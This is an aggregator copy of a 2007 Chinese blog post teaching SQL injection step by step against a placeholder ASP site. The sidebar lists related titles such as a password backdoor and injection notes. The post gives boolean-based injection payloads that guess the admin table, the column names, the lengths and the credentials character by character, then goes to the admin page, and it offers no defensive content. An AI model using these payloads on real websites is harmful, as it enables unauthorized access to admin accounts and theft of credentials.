惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

T
Threat Research - Cisco Blogs
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
V
Vulnerabilities – Threatpost
GbyAI
GbyAI
P
Proofpoint News Feed
L
LINUX DO - 热门话题
P
Palo Alto Networks Blog
A
About on SuperTechFans
T
Tenable Blog
M
MIT News - Artificial intelligence
IT之家
IT之家
I
Intezer
D
DataBreaches.Net
爱范儿
爱范儿
T
Threatpost
C
CERT Recently Published Vulnerability Notes
云风的 BLOG
云风的 BLOG
博客园 - 三生石上(FineUI控件)
WordPress大学
WordPress大学
K
Kaspersky official blog
大猫的无限游戏
大猫的无限游戏
A
Arctic Wolf
Y
Y Combinator Blog
Cyberwarzone
Cyberwarzone
酷 壳 – CoolShell
酷 壳 – CoolShell
D
Darknet – Hacking Tools, Hacker News & Cyber Security
H
Help Net Security
Microsoft Security Blog
Microsoft Security Blog
Spread Privacy
Spread Privacy
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
AWS News Blog
AWS News Blog
博客园 - 聂微东
C
Check Point Blog
S
Securelist
有赞技术团队
有赞技术团队
雷峰网
雷峰网
aimingoo的专栏
aimingoo的专栏
Last Week in AI
Last Week in AI
Stack Overflow Blog
Stack Overflow Blog
MongoDB | Blog
MongoDB | Blog
D
Docker
G
GRAHAM CLULEY
T
The Exploit Database - CXSecurity.com
C
Cybersecurity and Infrastructure Security Agency CISA
T
Tailwind CSS Blog
L
Lohrmann on Cybersecurity
G
Google Developers Blog
C
Cyber Attacks, Cyber Crime and Cyber Security
L
LangChain Blog

博客园 - 小辉

好久不来了。!!!! 迎接新生命!!! 通过风险评估掌握当前的安全状况 关于加强国家电子政务工程建设项目信息安全风险评估工作的通知 利用IAT hook实现windows通用密码后门 果然是够懒的。。。半个多月过去了。 生日ing 懒惰啊,懒惰 挂马问题的补充 - 小辉 - 博客园 某头大牛的文章(解决挂马问题) 检索程序VBS 结婚了~~呵呵 目标!~~~ 期待2007年的5月!! 了解与防范"熊猫烧香"病毒 《星际争霸》与设计模式(3)——观察者模式 《星际争霸》与设计模式(2)——工厂方法模式 《星际争霸》与设计模式(1)——简单工厂模式 (转) 歌词-- Mssql高级注入笔记.txt (转自:慕容小雨BLOG)
SQL注入基础 - -
小辉 · 2007-12-25 · via 博客园 - 小辉
                                      

<table width="100%" height="100%" cellspacing="0" cellpadding="0" border="0"><tbody>
<tr valign="top">
<td colspan="4"><br /></td></tr>
<tr valign="top">
<td height="100%" style="" colspan="4"><span id="yuyuzi">
<p>   目标:<a target="_blank" href="http://www.xxxx.com/">www.xxxx.com</a><br />  <br />  
打开:<a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a>在其后面加'为<a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47'">http://www.xxxx.com/wz/list.asp?id=47'</a><br />出错!ID没有过滤。<br />  
★好!现在的步骤是:<br />1 猜管理员帐号表<br />2 猜相应表中的用户的字段名以及密码的字段名。<br />3 猜出用户名的长度和密码的长度<br />4
猜出用户和密码<br />5 找到管理页面进入管理</p>
<p>    ★猜管理员的表:<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin)'//min(id)<br />  返回表中ID最小值<br />  
返回文章证明,有一个admin的表;如果没有返回文章,证明出错不存在admin这个表。<br />    <br />    ★猜用户的字段名:<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin where user='qqq')<br />  返回错误信息,表示没有user这个用户段名<br />  
再来!~~~http://www.xxxx.com/wz/list.asp?id=47 and 1=(select min(id) from admin
where username='qqq')<br />  
没有返回错误信息,又没有返回文章,提示找不到文章。证明在admin中存在username这个字段,只是用户名不是qqq</p>
<p>    ★猜密码的字段名:<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin where passwd='qqq')<br />  返回错误信息表示没有passwd这个密码字段名。<br />  再来:<a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin where password='qqq')<br />  
没有返回错误信息,又没有返回文章,提示找不到文章。证明在admin中存在password这个字段,只是密码不是qqq<br /> <br />    
★猜用户字段名长度:<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin wherelen(username)>5)<br />  正确<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin wherelen(username)<10)<br />  正确<br />    用户名长度大于5小于10<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin wherelen(username)=7)<br />  呵``` 用户名长度为7位</p>
<p>   ★猜密码长度<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin wherelen(password)>5)<br />  正确<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin wherelen(password)<10)<br />  正确<br />    密码长度也是大于5小于10<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin wherelen(password)=7)<br />  呵``` 密码长度为7位<br />    <br />   ★猜用户名<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin wheremid(username,1,1)='q') <br />    用户名第一个字母是:q<br />    
猜用户名第二位:http://www.xxxx.com/wz/list.asp?id=47 and 1=(select min(id) from admin
wheremid(username,2,1)='a')<br />    以此类推!</p>
<p>   ★现在来猜密码:猜密码跟猜用户名一样!<br /> <a target="_blank" href="http://www.xxxx.com/wz/list.asp?id=47">http://www.xxxx.com/wz/list.asp?id=47</a> and 1=(select min(id)
from admin wheremid(password,1,1)='q') <br />   <br />   ★猜完后来到管理页面:<br /><a target="_blank" href="http://www.xxxx.com/wz/admin.asp">http://www.xxxx.com/wz/admin.asp</a></p></span></td></tr></tbody></table>

此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。